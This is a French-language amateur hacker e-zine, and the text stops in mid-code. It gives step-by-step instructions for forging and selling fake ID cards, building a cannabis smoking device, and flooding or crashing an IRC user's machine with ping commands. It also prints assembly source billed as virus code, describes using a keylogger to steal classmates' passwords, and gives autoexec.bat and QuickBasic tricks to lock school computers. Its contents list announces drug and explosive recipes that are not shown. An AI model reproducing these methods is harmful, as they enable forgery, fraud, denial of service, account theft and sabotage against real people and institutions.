_ _ _ _ _ |H| |H| /A\ QQQQQQQ CCCCCCCC |H| |H| |H| |H| /AAA\ QQ QQ CC |H| |H| |H|____|H| /A/ \A\ QQ QQ CC |H| |H| |H|HHHH|H| /A/___\A\ QQ QQ CC |H|HHHH|H| |H| |H| /AAAAAAAAA\ QQ QQ CC |H| |H| |H| |H| /A/ \A\ QQ QQ CC |H| |H| |H| |H| /A/ \A\ QQQQQQQ QQ CCCCCCCC |H| |H| Bon ben cé parti, ma nouvelle e-zine. J'espere que celle-ci va plaire aux gens qui la lisent. Pour commencer, je vais répèter la même routine que habituellement une e-zine "illégal" annonce en début d'intro (Que j'Ai copier quelque part). La lecture de cette publication électronique implique la lecture de ce cet extrait:. Ce texte est fourni au lecteur à titre purement éducatif et informatif.En aucun cas les auteurs n'incitent ce dernier au non respect de la loi, sous toute forme qu'il soit.Ce texte est destiné uniquement aux personnes auxquelles les auteurs l'ont remis, en conséquence il peut être considérée comme une communication privée des auteurs avec ces personnes. Toute organisation représentant un ordre quelconque ou toute agence de renseignement est considérée comme étrangère aux personnes autorisées à lire ce texte et en conséquence aucune poursuite ne pourraître faite contre les auteurs pour leur publication. Pour les curieux qui se demande ce que ca veux dire haqch, mais dite vous que j'Ai pris ca au hasard, c'est pourquoi faite aller votre imagination. Adresse: http://www.haqch.espace2001.com email: bobki@altern.org Channel irc: #haqch sur Undernet Possibiliter de key: qch (Quelquefois mon bot fuck) Si vous voulez faire parti de la gang contacter moi!!!! Vu que c'est la première, et que j'Ai pas eu grand temps pour la faire, elle ne sera pas bien longue, mais on va se reprendre dans le deuxieme numéro, qui lui, va sortir un jour, mais quand??? Quand je vais avoir le temps!!!. Et pour bien débuter cette e-zine, je vous souhaite bonne lecture!!!!!!!!!! Derniere chose, je voudrais dire que je me fou completement des fautes d'orthographes, facque venez pas m'Achaler avec ca. _____________________________________________________________________________ ____________________________________________________________________________ Table des matieres 1- _Franck--->>> Comment se débuter une compagnie de fausses cartes. 2- _Franck--->>> Qu'est-ce que un Stromgol??? 3- _Franck--->>> Démasquez les chevaux de Troie. 4- endrix---->>> Le ping 5- endrix---->>> Les Virus 6- endrix---->>> La Protection 7- endrix---->>> Fun sur les Ordis De l'Ecole 8- endrix---->>> Fichiers PWL 9- PiX1------>>> Comment créé...de la mesa sapientum banadine 10-PiX1------>>> Comment créé...(un dérivé du) LSD-25 11-PiX1------>>> Le saviez-vous? 12-Tod------->>> Le canna punch 13-_Franck--->>> Comment faire du Nitrate de Potassium? 14-_Franck--->>> Comment fabriquer de la poudre noir (Poudre a Canon)? 15-_Franck--->>> Comment fabriquer une bombe de chlore de piscine? 16-_Franck--->>> Désignations courantes. 17-_Franck--->>> Comment faire des meches qui brulent 2 pouces a la minute? 18-_Franck--->>> Comment faire des meches qui brulent 40 pouces a la minute? 19-_Franck--->>> Comment faire des feux de différentes couleurs?(feux de bengales) ___________________________________________________________________________________________________________________________________________________________ _Franck--->>>Comment se débuter une compagnie de fausses cartes<<<----------- Dans l'Article qui va suivre, je parle pas de carte d'identité parfaite, comme celle d'assurance maladie, mais bien des cartes comme celle de l'école, du permis de conduire ou d'autres cartes qui n'ont pas de relief ou d'hologramme dessus. Pourquoi avoir une fausse carte: 1- Si ta pas 18 ans, et que tu veux rentrer dans les bars ou acheter des armes ou autres. 2- Si tu veux te faire venir un colis sous un autre nom. 3- Si t'emprunte un objet avec une carte d'identité, et que l'intention de ne pas le remettre. 4- Ou pour crosser les cochons (polices) Matériaux nécessaires: 1- Un Scanneur de haute qualité (préférence: plus que 600X600 par pouce carré) 2- Une imprimante (laser de préférence) (préférence: plus que 600X600 par pouce carré) 3-Un logiciel pour modifier des images 4-Un plastificateur (entre 3 et 5 mm) ****PLus que votre imprimante et votre scanneur est de qualité (points,pouce), mieux seront les cartes. Procédure: Vous prener votre carte, la scanner à la meilleur qualité possible. Ensuite, exemple vous voulez modifiez votre date de naissance pour avoir 18 ans. Exemple que votre date est 82-09-18 et quelle est écrit avec une police spécial, tu essais de faire des copies coller. Exemple: tu copie le 0 et tu le place par dessus le 2 de l'Année de naissance, ce qui donne 80-09-18.Pour autres changements sur la carte cé une technique similaire. Ensuite vous imprimez à une qualité la plus élever possible.Par la suite, vous découper votre fausse carte, de maniere quel soit la meme grosseur que la vrai, et vous plastifier le tout, avec un plastique la même épaisseur que l'original. Pour le commerce: Cela peu être tràs payant si vous vous équipiez d'équipements exéllents.PLus les cartes sont exellentes plus les gens sont intéresser a payer le prix parce qu'ils ont moins de chance de se faire prendre. C'est pourquoi si vous vous équipier d'un scanner (600X600) avec une imprimante laser similaire et un plastificateur (Cela les 3 ensemble vous coutera entre 900$ et 2500$), vous pouvez faire une bonne qualité de carte d'identité.Si vous vendez les cartes que vous faisez 15$ chaque ou même 25$, cé pas long et votre équipement est payer, et surtout, les profits commence à rentrer. Un conseil, essayer de vendre vos fausses cartes juste au gens que vous connaissez pour pas vous faire prendre. Je vous souhaite bonne carriere!!!héhé _Franck _________________________________________________________________________________________________________________________________________________________ _Franck ---------->>>>> Qu'est-ce que un Stromgol??? <<<<<-------------- Dans l'Article qui suit, une technique de fumage (weed ou autre) va etre présenté, pour cetain elle est déja connu, pour d'autre vous allez apprendre un nouveau et merveilleux truc pour consummer votre "boucane". Premierement, le nom Stromgol à été batiser par un de mes chums, mais cette invention peut porter un autre nom dans différentes endroits dans le monde. J'explique le principe. Matériaux 1 bouteille de 2 litres de liqueurs vide (avec bouchon) 1 couteau pour couper du plastique 1 tuyaux de plastique flexible (Environ 2 pieds) 1 ruban adhésif 2 Couteaux pour fumer 1 Torche pour chauffer (propane ou autre) les couteaux à rouge 2 Personnes de préférences Une quantité de stock à fumer Explications -Prener votre bouteille 2 litres et percer un trou de la forme d'un carré sur l'un des cotés (3 pouces par 3 pouces). -Percer un trou dans le bouchon la grosseur du tuyau. -Placer le tuyau dans le trou du bouchon, en mettant environ 2 pouces de tuyaux dans la parti de la bouteille. -Prendre le ruban adhésif, et coller le tuyau au bouchon de facon que l'Air ne puisse sortir en dehors du tuyau. -A cette étape votre Stromgol est pret. -Voici un dessin que j'Ai fais pour vous montrer de quoi ca l'Air. C'est le fichier stromgol.bmp dans le document .zip dont est compris ce document -Ensuite vous faite chauffer les couteaux à rouge avec la torche pour fumer vos pofs. -Vous metter votre bouche sur le tuyaux, votre chum prend la pof avec les couteaux, et met les couteau dans le trou de forme carré pour que la boucane reste dans la bouteille, et vous durant ce temps vous aspirer. -Vous recommencer les 2 dernières étapes au besoins -Cela est un résumer bref de cette technique de fumage, mais elle est assez simple. Avec ce truc vos soirés vont etre encore plus animer et vont vous coûter moins cher, parce que vous allez voir que il faut moins de "stock" pour procurer uen excellente effet, héhé..... Articles produite par _Franck _________________________________________________________________________________________________________________________________________________________ _Franck------------->>>Démasquez les chevaux de Troie<<<-------------------- Pour savoir si un cheval de Troie est installé sur votre PC et s'il envoie clandestinement des informations par l'internet, servez-vous d'un utilitaire système de Windows. Ce programme, Netstat, n'est hélas pas accessible par le menu Démarrer ni documenté dans l'aide de Windows. Vous pouvez toutefois le lancer avec la commande netstat dans une invite MS-DOS. Pour détecter un cheval de Troie, procédez de la façon suivante. 1-Fermez toutes les applications de transmission par l'internet. Noubliez pas les programmes de courrier électronique qui vérifient régulierement l'arrive de nouveau courrier sur le serveur POP ou Personal Web Serveur Ces programmes pourraient en effet falsifier les valeurs mesurées et provoquer une fausse alerte. 2-Connectez-vous sur n'importe quel ftp 3-Sur le ftp téléchanger un fichier d'environ 1 meg pour faire croire à une activité en ligne. Le cheval de Troie est conçu pour attendre une connexion Internet active par laquelle il peut transférer ses données. Pour ne pas se faire remarquer, il s'assure que l'utilisateur se sert activement de cette connexion. Ses propres paquets de données sont ainsi dissimulés dans la masse. 4-Enregistrer le fichier sur le disque dur. 5-Ouvrez une fenêtre DOS avec la commande Démarrer/Programmes/Commandes MS-DOS. 6-Vérifiez avec Netstat quelles connexion TCP/IP sont acuellement actives. Laissez fonctionner Netstat pendant un moment tout en enregistrant les résultats dans un fichier journal. Pour cela tapez la commande: netstat -a 1 > netstat.txt Explication des options de cette ligne: -a: oblige Netstat à surveiller toutes les connexions existantes. Par défaut et pour ne pas submerger l'utilisateur, le programme se contente des informations indispensables. Les informations trahissant une éventuelle transmission clandestine risquent alors d'être ignorées. C'est pourquoi vous devez vous assurer que Netstat enregistre toutes les données. Le chifre détermine en secondes le laps de temps que Netstat laisse écouler entre les vérifications. Nous avons choisi l'intervalle le plus petit, 1, pour qu'aucune connexion ne nous échappe. Par défaut. Netstat affiche les résultats à l'écran. Toutefois cet intervalle d'une seconde ne laisse pas le temps de lire. C'est pourquoi nous demandons au programme de sortir les informations dans le fichier Netstat.txt à l'aide de la commande > netstat.txt . Cette commande n'est d'ailleur pas spécifique à Netstat, elle fonctionne dans tous les programmes de l'invite MS-DOS. 7- Au bout d'un moment, quittez Netstat en appuyant sur les touches Ctrl + C 8-Arrêter la connexion FTP, même si le fichier n'est pas entièrement téléchargé. 9-Fermez la connexion internet. 10-Dans un éditeur de texte quelconque, ouvrez le fichier Netstat.txt, en vérifiez les connexions enregistrées. Si vous voyez des communications avec d'Autres ordinateurs, méfiez-vous. Notamment si vous trouver un numero IP au lieu d'un nom complet. Il s'agit vraisemblablement d'une transmission suspecte. Ce texte-ci a été prit dans le livre "Sécurité et Protection", p 206. Article produite par _Franck __________________________________________________________________________________________________________________________________________________________ ============================================================================= ============================================================================= _ ____ _ | | ___| _ \(_)_ __ __ _ | | / _ \ |_) | | '_ \ / _` | | |__| __/ __/| | | | | (_| | |_____\___|_| |_|_| |_|\__, | |___/ ============================================================================= =================================par endrix================================== Bon.... Pourquoi j'ai écrit ce texte ??? Ben parce que je suis vraiment tannez de dire au personnes comment utiliser cette fonction quelque peut "cacher" de Microsoft qui, part fois, peux etre tres destructive. Pour me contacter, mon email est : lordendrix@hotmail.com . Pour commencer, Ping sert a compter, en temps, le lag qu'il y a entre deux ordinateur. Vous verez les signes suivants : time<10ms ce qui veut dire qu'il y a 10 millisecondes de lag entre les ordis. Donc, de cette manière, vous envoyez un signal a l'autre ordinateur et lui vous réponds. Mais, Comment je peux faire crasher un ordi avec ca ??? Bon.... pensons un peu... Si tu as une connection rapide, comme un modem cable, ou une ligne LNPA, ou ISDN.... Tu peux envoyer des pings TRÔS rapidement on peut appeller ca... un ping flood !! La différence entre un ping flood de irc et un ping flood directement sur la connection du gars c'est qui si c'est de irc, la connection va débranché mais l'ordi plantera pas :)))) Maintenant, voyon voir de quoi a l'air ping.exe(dans le dir de windows) Allez Démarer, Programme et ensuite dans Commande MS-DOS. Apres, vous allez voir : Microsoft(R) Windows 98 (C)Copyright Microsoft Corp 1981-1998 C:\WINDOWS> tapez : C:\WINDOWS>ping vous allez voir : Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS] [-r count] [-s count] [[-j host-list] | [-k host-list]] [-w timeout] destination-list Options: -t Ping the specifed host until stopped. To see statistics and continue - type Control-Break; To stop - type Control-C. -a Resolve addresses to hostnames. -n count Number of echo requests to send. -l size Send buffer size. -f Set Don't Fragment flag in packet. -i TTL Time To Live. -v TOS Type Of Service. -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list. -w timeout Timeout in milliseconds to wait for each reply. Vous voyez que vous pouvez faire plusieurs combinaisons avec la commande ping. · cette ligne, faite la commande suivante : C:\WINDOWS\ping -t -l 10 127.0.0.1 Ca sa va pigner votre ordinateur. C'est suppos‚ donner ca : Pinging 127.0.0.1 with 10 bytes of data: Reply from 127.0.0.1: bytes=10 time=1ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 Reply from 127.0.0.1: bytes=10 time<10ms TTL=128 jusqu'à temps que vous l'arrêtiez....... Vous voyez que le temps entre votre ordinateur et.... votre ordinateur n'est pas trŠs long !! :-| Bon.... supposont qu'il y a un con qui vous fait chier.. son nick : con Allez dans le Status, tappez : /dns con cette commande va vous donnez son IP (ex : 207.96.128.233) Les 3 premiers chiffres sont du serveur et le dernier, c'est le nombre de connection ulitiler(max 255). Donc, retournez dans votre fenˆtre dos et tappez: C:\WINDOWS>ping -t -l 256 207.96.128.233 faite cette commande plusieur fois, ouvrez plusieurs fenˆtre dos et il va faire un ping timeout. comment faire crasher un system Windows 98 ???? Quand vous allez faire le /dns con, vous verez quelque chose comme ca : ***Looking up port013.cactuscom.com ***Resolved port013.cactuscom.com to 207.253.190.13 Le IP est 207.253.190.13 et le domaine : port013.cactuscom.com C:\WINDOWS\ping -l 65510 port013.cactuscom.com Plusieurs fenˆtres et, bye bye dude !!! J'espŠre que vous ferez pas trop de connerie avec ca la !!!! Adios et a bient“t, endrix Http://haqch.espace2001.com ...oO Pour plus de Zines Oo... ============================================================================= ============================================================================= ============================================================================= ================================= Par endrix================================= ============================================================================= __ ___ _ _ \ \ / (_)_ __(_|_) \ \ / /| | '__| | | \ V / | | | | | | \_/ |_|_| |_|_| ============================================================================= ============================================================================= ============================================================================= Introduction : Les virus sont devenus une menace permanente. Une infection est actuellement 20 fois plus probable qu’il y a 2 ans. On estime qu’une entreprise infectée a besoin de 5 jours ouvrables pour se d‚barrasser totalement de l’assaillant. Donc la lutte antivirus revêt une importance majeure. Mais si vous avez des commentaires, suggestions ou juste me e-mailer ben faite le a cette addresse : fbasoft@yahoo.com ou sur le chat, je suis sur #outaouais-warrior ou #outaouais ou #n0past et #pirate sous le nick de : endrix Site web : http://www.haqch.espace2001.com 1 : Qu'est-ce qu'un virus ? Un virus est un programme autoreproducteur capable de se propager de facon autonome. Il causera des d‚gats dans le systeme qu'il a infecte. Ces degats soit d'ordre logiciel soit meme materiel, certains n'hesitent pas a detruire votre BIOS, et vont de l'affichage d'un petit message au formatage complet de votre disque dur. Voici les sources d'infections : Une disquette dont le secteur d’amorce est infecte. Une disquette qui comporte un fichier executable infecte. Un LAN (Local Area Network ou reseau local) qui contient un poste infecte. Internet, par simple telechargement. Le courrier electronique, par un document joint infecte. 2 : Types de virus On classe les virus de 5 façons : - Virus du secteur d’amorce ; ils remplacent l’amorce d’un disque par leur propre code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le disque d’amorçage et/ou se propagent vers d’autres disques. - Virus de fichiers ; ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat ) et se chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il rendent ces programmes inutilisables. - Virus furtifs ; ils échappent à toute détection en se camouflant. Une des méthodes de détection consiste à enregistrer la longueur d’un programme (si le virus a ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce progr. ) - Virus polymorphes ; ils modifient leur aspect à chaque nouvelle infection. - Virus cryptés ; ils modifient leur code, ce qui complique leur détection. On peut ajouter 2 cas, mais souvent moins fréquents à cause de leur puissance : - Cheval de Troie ; bombe à retardement implantée dans un programme. Il peut se déclencher à tout moment ou attendre un signal externe. Ce n’est donc pas un virus puisqu’il n’est pas conçu pour se reproduire et se propager. - Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour exploser. Ce signal peut être une date précise, un lancement d’un certain programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel des fois, comme une modification du BIOS pour entraîner une surcharge électrique. 3 : Symptomes d'une attaque Voici les principaux symptomes : - Un chargement d’un programme plus long que d'habitude. - Un reseau anormalement charge. - Memoire centrale insuffisante. - Espace disque réduit. - Taille de fichiers qui s'accroît anormalement. - Systome et/ou programmes qui plantent. - Messages d'erreurs ou messages curieux. - Un jeu de ping-pong apparaît. - Les caracteres s'ecroulent. - Melodies bizarres au format midi. - Acces disque multiplies. - Perte de fichiers et de données. - Programmes refusant de s’exécuter ou s’exécutent mais de façon anormale. - Autoformatage du disque dur. 4 : Fichiers cibles des virus Le premier objectif est la contamination de une ou plusieurs cibles qui lui permettront d'etre relance le plus souvent possible. Une cible est appelee vecteur de contamination. En principe, il existe 3 phases d'existence : Infection ; le virus infecte le systome cible. Contamination ; il se duplique et infecte d’autres cibles sans perturber le fonctionnement du systome. Destruction ; il entre en activite et produit les effets pour lesquels il a ete programme. Cibles des virus : - Fichiers executables, surtout les .COM (avec le tres celebre COMMAND.COM qui est lance a chaque démarrage du système ). - Fichiers systomes, particulierement les IO.SYS et MSDOS.SYS (qui sont lances au demarrage du systome aussi) . - Les fichiers temporaires de recouvrement .OVL . - Fichiers binaires .BIN. - Fichiers pilotes .DRV. - Le secteur de la table de partition du disque dur (lu par le BIOS à chaque initialisation) ou d'une disquette BOOT. 5 : Programmes antivirus - Thunderbyte (http://www.thunderbyte.com) - Panda (http://www.pandasoftware.com) - Norton (http://www.nortonutilities.com) - bien d'autre.... 6 : Voici la source d'un Virus(en asm) : DSCE_GEN SEGMENT ASSUME CS:DSCE_GEN,DS:DSCE_GEN ORG 0100h MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0007h EXTRN DSCE:NEAR,DSCE_END:NEAR EXTRN RND:NEAR ; ¥H¤Uµ{¦¡¡AÝ£¤F­nª`·NªÝ¦a¤è¦Ýª`¸Ñ¡A¨ä¥¦Ý¡¥÷¦Ý¤v¬ã¨s START: MOV AH,09h MOV DX,OFFSET DG_MSG INT 21h MOV AX,OFFSET DSCE_END+000Fh ; ¥+µ{¦¡ + DSCE+000Fh ¤§«áªÝ¦ì§} ; ­YÝî 0100h «h¦¨¬Ý¥+µ{¦¡ + DSCE ªÝªø«× MOV CL,04h SHR AX,CL MOV BX,CS ADD BX,AX MOV ES,BX ; Ý] ES ¥+¨Ó©ñ¸Ñ½Xµ{¦¡©MÝQ½s½X¸ê®Æ ; ¸Ñ½Xµ{¦¡Ýݤj¬Ý 1024 Bytes ; ­Y¥+¦bÝ`¾nµ{¦¡®+¡A«h¶·ª`·N¤+ÝtªÝÝO¾Ð+é¤j¤p MOV CX,50 DG_L0: PUSH CX MOV AH,3Ch XOR CX,CX MOV DX,OFFSET FILE_NAME INT 21h XCHG BX,AX MOV BP,0100h ; ¸Ñ½Xµ{¦¡Ý¾Ý¾¦ì§} ; ¥+¨Ó+g¬r®+«h¨ÝÝý·P¬V++®×¤§¤j¤p¦ÓÝ] MOV CX,OFFSET PROC_END-OFFSET PROC_START ; ÝQ½s½Xµ{¦¡ªÝªø«× MOV DX,OFFSET PROC_START ; DS:DX -> ­nÝQ½s½XªÝµ{¦¡¦ì§} PUSH BX ; «O¦s File handle CALL RND XCHG BX,AX CALL DSCE POP BX MOV AH,40h ; ªð¦^®+ DS:DX = ¸Ñ½Xµ{¦¡ + ÝQ½s½Xµ{¦¡ªÝ¦ì§} INT 21h ; CX = ¸Ñ½Xµ{¦¡ + ÝQ½s½Xµ{¦¡ªÝªø«×¡A¨ä¥¦++¦s¾Ý¤£+_ MOV AH,3Eh INT 21h PUSH CS POP DS ; ÝN DS Ý]¦^¨Ó MOV BX,OFFSET FILE_NUM INC BYTE PTR DS:[BX+0001h] CMP BYTE PTR DS:[BX+0001h],'9' JBE DG_L1 INC BYTE PTR DS:[BX] MOV BYTE PTR DS:[BX+0001h],'0' DG_L1: POP CX LOOP DG_L0 MOV AH,4Ch INT 21h FILE_NAME DB '000000' FILE_NUM DB '00.COM',00h DG_MSG DB 'Generates 50 DSCE encrypted test files.',0Dh,0Ah,'$' PROC_START: PUSH CS POP DS MOV AH,09h CALL $+0003h POP DX ADD DX,MSG_ADDR INT 21h INT 20h MSG DB 'Dark Slayer !!$' PROC_END: DSCE_GEN ENDS END START 7: Conclusion : Ben la j'espère qu'en lisant, vous avez apprit sur les virus et les leurs fonctions. ============================================================================== ============================================================================== ============================================================================== - endrix ============================================================================== ================================= Par endrix ================================= ============================================================================== ____ _ _ _ | _ \ _ __ ___ | |_ ___ ___| |_(_) ___ _ __ | |_) | '__/ _ \| __/ _ \/ __| __| |/ _ \| '_ \ | __/| | | (_) | || __/ (__| |_| | (_) | | | | |_| |_| \___/ \__\___|\___|\__|_|\___/|_| |_| ============================================================================== ============================================================================== ============================================================================== ----VOUS VOULEZ ETRE INVINCIBLE ??? FUCK WINDOWS ET FAITE PLACE A LINUX!!!---- Introductions : Bienvenue dans le mon du piratage. Ce document va vous décrire : (1) Qu'est-ce que piratage. (2) Technique employe pour "hacker un micro". (3) Description des techniques. (4) Ou trouver les outils necessaires pour effectuer des petites attaques. (5) Outil pour vous protéger (6) Mot de la fin. Eh bien j'espere que ce texte vous aidera a vous protéger et je connais quelques personnes qui voudront me tuer après avoir ecrit ce texte.... heehe.... Mais si vous avez des commentaires, suggestions ou juste me e-mailer ben faite le à cette addresse : fbasoft@yahoo.com ou sur le chat, je suis sur #outaouais-warrior ou #outaouais ou sur #n0past et #pirate sous le nick de : endrix http://endrix.cjb.net (1) Qu'est-ce que le piratage ??? Le piratage, hacking and anglais, est l'art de s'infiltrer dans des systeme informatique dont tu n'as pas l'accès et prendre de l'information sans rien détruire. Etre un hacker, c'est etre curieux, découvrir de nouvelle choses, le défit de pénétrer des systèmes super protégé comme : (FBI, NSA, CIA, Microsoft, IBM......) Il y a aussi le "cracking" le cracking a 2 fignification : 1. "Cracker" un programme c'est editer un .exe et le modifier pour pouvoir l'utiliser sans limite. Souvent si vous avez des programmes qui sont d'une période d'utilisation de 30 jours, ben il existe des "cracks" qui vont faire que vous pourrez l'utiliser toute votre vie !!! Pour plus d'info : http://cracking.home.ml.org http://get-oscar.home.ml.org http://www.phrozencrew.org (marche pas tout le temps) 2. "Cracker" un système informatique c'est aussi le pirater mais le "cracker" ne prend pas seulment les donnés, il essait de détruire le système avec un virus, en supprimant des fichiers..... Pour plus d'info : http://www.hackhull.com <-- master of NT destruction (2) Technique pour hacker un micro Pour hacker un micro, il y a plusieur technique et voici quelques une : - Les programmes qui ouvre un "backdoor" sur votre ordi : - BackOrifice (par http://cultdeadcow.com v1 et v2) - Master's paradise - Hacker's paradise (dur à trouver) - Backdoor2 - Socket de Troie - Absolute Control - NetBUS - je pense que c'est tout la.... - Technique de partage de fichier un réseaux - Le reniflement (sniffing) - L'addresse factice (IP spoofing et pour hacker les gros serveurs) - Les vers (plus pour hacker les gros systemes) - Les trapes (beaucoup dans Windoz) - Force brute (plus pour hacker les gros systemes) (3) Description des techniques - Les programmes qui ouvre un "backdoor" sur votre ordi. Tout ces programmes marchent de la meme manière. Ils ont tous desoin d'un virus et en passant CE VIRUS NE FORMAT PAS VOTRE ORDI. Je connais quelques personnes qui pensent ca mais c pas vrai !! oky ?! La fonction du virus d'ouvrir un port sur votre ordi (5000, 31337 et 12345) et le virus agis comme serveur et le programme comme client. Donc quand vous êtes infectés par le virus, vous avez juste à entrer le IP de la personne (dans irc, en faisant /dns (le nick du gars) et clicker sur connect pi le virus vous donne accès à l'ordi du gars !!! Pi après être connecté, vous pouvez.... mmmm... Modifier le reg, accès au HD, ouvrir sont CD-ROM, lui envoyer des messages, mettre un mot de passe sur sont ordi(avec netbus mais il y a des passwords cracker).... tout faire !!!! Pour plus d'information sur les trojans, leurs virus et tous... consulté le document "Trojans" (vol 1.4) - Technique de partage de fichier Cette technique fonctionne seulement si dans votre configuration réseaux vous êtes en partage de fichier. Ya pas beaucoup de monde qui sont comme ca mais il y en a. Cette technique consiste à se connecter sur l'ordi du mec avec les commandes de dos suivante : - nbtstat.exe - nslookup.exe - net view \\.... Je ne vais pas montrer comment utiliser cette manière. - Reniflement (sniffing) Le pirate reprogramme l'ordinateur pour qu'il intercepte chaque message qui traverse le réseaux, meme si celui-ci ne lui est pas addressé. - L'addresse factice (IP spoofing) L'addresse d'un ordinateur, Internet Provider(IP), qui permet de le reconnaître sur le réseaux, est unique. Elle est octroyée par des services spécialisé et certifiés. Un pirate peut parfaitement modifier celle de sont ordinateur et se faire passer pour quelqu'un de connu du serveur victime (aussi utilisé pour faire des "takeovers" sur irc. - Les vers Il s'aggit d'un programme intelligent et autonomes capables de se propager et de se dupliquer seuls(un virus). Ce type d'attaque est très rare parce que les serveurs se dodifis beaucoup mais windoz NT fonctionne très bien avec ces choses la...... - Les trappes Ce sont des points d'entrée volontairement créés par les concepteurs des systèmes d'exploitation. Les trappes ignorent toutes les mesures. Comment en 1983, Ken Thompson, l'un des concepteurs d'Unix a révélé l'existence d'une trappe. Juste en tapant une comande, d'importe qui pouvais se connecter sur l'ordinateur d'un autre. - Force brute Technique qui consiste à trouver le mot de passe d'un serveur pour y pénétrer. Pour le faire ca prend un "password cracker". Ce programme, à parir d'un encyclopédie de mot essait tout les mot possible sur le mot de passe. (4) Ou trouver les outils nécessaires pour effectuer des petites attaques. CES OUTILS SONT POUR ESSAYER SUR VOUS MEME, PAS SUR LES AUTRES. - Des passwords crackers - Des Nukers, OOB, ICMP - Texts - FAQ - Flooders, ICQ, Irc - Port Scanners, Listeners - Trojans - Beaucoup d'autres !!! ... ------- - WarForge : http://www.warforge.com - Anti-Online : http://www.antionline.com - Hackers : http://www.hackers.com - Ou juste me le demander (5) Outil pour vous protéger. - BouffeTroyen (delete les trogens sur votre ordi) http://bouffetroyen.cjb.net - Conseal PC Firewall (un bon firewall) http://www.signal9.com - @Guard (FireWall) http://www.???.com - PC secure (FireWall) http://www.???.com - Port Listen (FireWall) demandez le moi - NukeNabber (FireWall) http://www.???.com (6) Mot de la fin. Maintenant que vous savez comment fonctionne le "hacking", vous allez vous procurer les outils que j'ai dit et protéger votre micro. ============================================================================== ============================================================================== ============================================================================== - endrix =========================================================================== ================================= Par endrix ================================= ============================================================================== _____ ___ ____ _____ | ___/ _ \ | _ \ | ____| | |_ | | | || | | || _| | _|| |_| || |_| || |___ |_|(_)\___(_)____(_)_____| Fun sur les Ordis De l'Ecole ============================================================================== ============================================================================== ============================================================================== Introduction : Vous trouvez l'ecole plate comme moi ??? Bien, j'ai trouve un moyen d'avoir ben du fun avec les ordinateurs de votre école! Moi ca a toujours bien marché pi ca a toujours fait capoter le prof ou le technicien en informatque. Dans ce texte, je vais vous dire quelque moyen de faire chier le prof d'info et le technicien en faisant des choses ben facile qui !!! Mais si vous avez des commentaires, suggestions ou juste me e-mailer ben faite le à cette addresse : fbasoft@yahoo.com ou sur le chat, je suis sur #outaouais-warrior ou #outaouais ou #pirate ou #n0past sous le nick de : endrix Http://www.haqch.espace2001.com (1er) Moyen(Novell) : Si vous allez dans un cegep au il faut entrer sont numero etudiant pour logger sur le reseaux(comme moi) lisez ceci! Ca c'est pour ceux qui ont Novell : 1 - Quand vous ouvrez l'ordinateur et que la fenetre de Novell apparait qui dit d'entrer le mot de passe, peser sur Ctrl+ESC, ceci va faire apparaître une autre fenêtre qui va vous permettre de loader n'importe quel programme sans que le technicien ne s'en appercoive. Vous pouvez aller sur l'internet, gosser avec les .exe dans c:\novell ..... Tout plein de choses à faire. 2 - Clicker sur l'icone de reseaux dans le bureaux, clicker sur n'importe quel icone(dans la fenêtre qui va appraitre) avec le boutton de cote et allez dans send message. Ceci va faire apparaitre un autre fenêtre qui si vous marquer le numero etudiant de votre ami, vous pouvez lui envoyer un message. Maintenant au cegep de Hull il est interdi d'utiliser la messagerie novell. 3 - Pour voller un mot de passe a quelqu'un. Aller downloader un keystroke recorder. Ce programme enregistre chaque touche qui a ete tappe sur le clavier. Apres avoir installer ce programme, attendez que quelqu'un log avec sont mot de passe et quand qu'elle est logger, allez la voir et dite quelque chose comme : "Scuse, j'ai oublier de copier un fichier texte, tu peux me laisser le faire ??" Naturellement elle va dire oui et allez copier le fichier que le programme a fait (dans le dir du programme). Quand la personne va se delogger aller sur un ordi, entrer le numero etudiant, le mot de passe de la personne(sur le fichier texte) pi la vous etes entrer sur sa connexion. Ne faites pas de connerie avec ca ! j'utilise IK comme Keystroke recorder. (http://www.???.com) (2eme) Moyen (n'importe quel ordi, novell ou pas) : 1 - Modifier le fichier c:\logo.sys. Ce fichier contient l'image de windows quand il load. +crivez quelque chose comme "!!!SCHOOL SUCKS!!!" 2 - Faite un programme en QuickBasic de mot de passe, screen saver.... ex : si le programme se nomme.... allo.exe (en quickbasic que vous avez fait.) copier le programme dans c:\windows\system Editer le autoexec.bat et après la ligne : PROMPT $p$g, marquer : c:\windows\system\allo.exe comme ca, a chaque fois que l'ordi va s'ouvrir, le programme va s'activer avant que Windows load. Si le programme contien une loop, l'ordi ne pourra plus s'ouvrir.. heehe.. Ou bien, à la place, après la ligne PROMPT $p$g, marquer c:\autoexec.bat comme ca, le autoexec.bat va faire une loop, heehe! Voici une source de mot de passe en Quickbasic : 1 CLS REM Fait par endrix PRINT "Stit, l'+cole sa SUCE!!! Entre le mot de passe :" INPUT pass$ IF pass$ = "jackass" OR pass$ = "JACKASS" THEN CLS PRINT "Mmmm.. Bon mot de passe, windows va loader..." SLEEP 3 ELSE FOR w = 1 TO 300 FOR a = 1 TO 15 COLOR a PRINT "Mauvais mot de passe"; NEXT a NEXT w GOTO 1 END IF L'Utilisateur ne pourra pas entrer dans Windows s'il n'a pas le bon mot de passe (qui est : jackass) Voici un source de graphique qui affiche "!!! YoUr CoMpUt3r 1s NoW FuCk3d Up !!!" d'une facon cool : SCREEN 9 REM Code par endrix BEEP BEEP DIM PI AS 